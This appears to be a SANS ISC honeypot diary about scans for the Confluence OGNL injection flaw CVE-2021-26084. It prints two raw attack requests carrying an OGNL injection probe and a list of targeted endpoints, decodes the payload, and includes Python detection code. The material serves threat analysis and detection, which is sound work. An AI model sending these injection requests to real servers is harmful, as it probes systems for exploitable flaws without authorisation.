Internet Wide Scan Fingerprinting Confluence Servers

Published: 2023-02-22
Last Updated: 2023-02-22 13:54:55 UTC
by Johannes Ullrich (Version: 1)

Looking over some of our honeypot logs today, I noticed one IP address, 60.223.74.99, scanning for several older Confluence vulnerabilities.

Confluence is the collaboration component of Atlassian's suite of developer tools [1]. Attacks against developers, and the tools they are using, are on the rise in general, and this is yet another "piece to the puzzle." A quick search using NIST's NVD shows 18 vulnerabilities in Confluence [2].

The scans use a known PoC exploit for CVE-2021-26084, an OGNL injection vulnerability [3].

Here are two sample requests sent by the attacker:

POST /users/user-dark-features HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

queryString=aaaa%5Cu0027%2B%7B506%2A5210%7D%2B%5Cu0027bbb

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

queryString=aaaa%5Cu0027%2B%7B3304%2A9626%7D%2B%5Cu0027bbb

All endpoints hit by the attacker:

/confluence/pages/createpage-entervariables.action
/confluence/pages/createpage-entervariables.action?SpaceKey=x
/pages/createpage.action?spaceKey=myproj
/pages/createpage-entervariables.action
/pages/createpage-entervariables.action?SpaceKey=x
/pages/doenterpagevariables.action
/pages/templates2/viewpagetemplate.action
/template/custom/content-editor
/templates/editor-preload-container
/users/user-dark-features
/wiki/pages/createpage-entervariables.action
/wiki/pages/createpage-entervariables.action?SpaceKey=x

The payload string decodes to:

aaaa'{506*5210}'bbb

The likely goal is to have the server return the result of the arithmetic expression: if the product comes back in the response, the injected OGNL was evaluated and the instance is vulnerable to this attack.
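As an added example (my own code, not part of the diary and not from any Atlassian component), the following Python decodes the queryString body the way the request would be interpreted (URL decoding, then Java-style \uXXXX unescaping, so the literal + signs survive), flags the {a*b} arithmetic probe, normalises the /confluence and /wiki context roots, and computes the product a vulnerable instance would echo back so response logs can be checked for it. The request tuples are constructed from the two requests above plus one benign request.

```python
import re
from urllib.parse import parse_qs

# Endpoints the diary lists as hit by the scanner (context root stripped).
PROBED_PATHS = {
    "/pages/createpage-entervariables.action",
    "/pages/createpage.action",
    "/pages/doenterpagevariables.action",
    "/pages/templates2/viewpagetemplate.action",
    "/template/custom/content-editor",
    "/templates/editor-preload-container",
    "/users/user-dark-features",
}

# Java-style \uXXXX escapes (e.g. \u0027 -> ') applied after URL decoding.
_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
# Arithmetic probe '{a*b}' (optionally wrapped in + concatenation) used to test OGNL evaluation.
_PROBE = re.compile(r"'\s*\+?\s*\{(\d+)\*(\d+)\}\s*\+?\s*'")

# Constructed sample input: the two diary requests plus one benign form post.
SAMPLE_REQUESTS = [
    ("POST", "/users/user-dark-features", "queryString=aaaa%5Cu0027%2B%7B506%2A5210%7D%2B%5Cu0027bbb"),
    ("POST", "/pages/createpage-entervariables.action?SpaceKey=x", "queryString=aaaa%5Cu0027%2B%7B3304%2A9626%7D%2B%5Cu0027bbb"),
    ("POST", "/pages/createpage-entervariables.action", "queryString=hello+world"),
]

def decode_payload(body):
    """URL-decode the form body (parse_qs does this) and then unescape \\uXXXX sequences."""
    raw = parse_qs(body, keep_blank_values=True).get("queryString", [""])[0]
    return _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), raw)

def inspect_request(method, target, body):
    """Classify one request; 'expected_reply' is the product a vulnerable server would return."""
    path = target.split("?", 1)[0]
    for prefix in ("/confluence", "/wiki"):  # context roots the scanner also tried
        if path.startswith(prefix + "/"):
            path = path[len(prefix):]
    decoded = decode_payload(body)
    m = _PROBE.search(decoded)
    return {
        "method": method,
        "path": path,
        "known_endpoint": path in PROBED_PATHS,
        "decoded": decoded,
        "probe": m is not None,
        "expected_reply": int(m.group(1)) * int(m.group(2)) if m else None,
    }

def scan(requests):
    """Return only the requests carrying the arithmetic probe."""
    return [r for r in (inspect_request(*req) for req in requests) if r["probe"]]
```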

No scans were seen from that source IP until today. It appears to be an otherwise unremarkable IP address allocated to what looks like a China Unicom consumer. It may be a CGNAT address used by China Unicom.

[1] https://www.atlassian.com/software/confluence
[2] https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=cpe%3A2.3%3Aa%3Aatlassian%3Aconfluence_data_center&search_type=all&isCpeNameSearch=false
[3] https://github.com/alt3kx/CVE-2021-26084_PoC

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu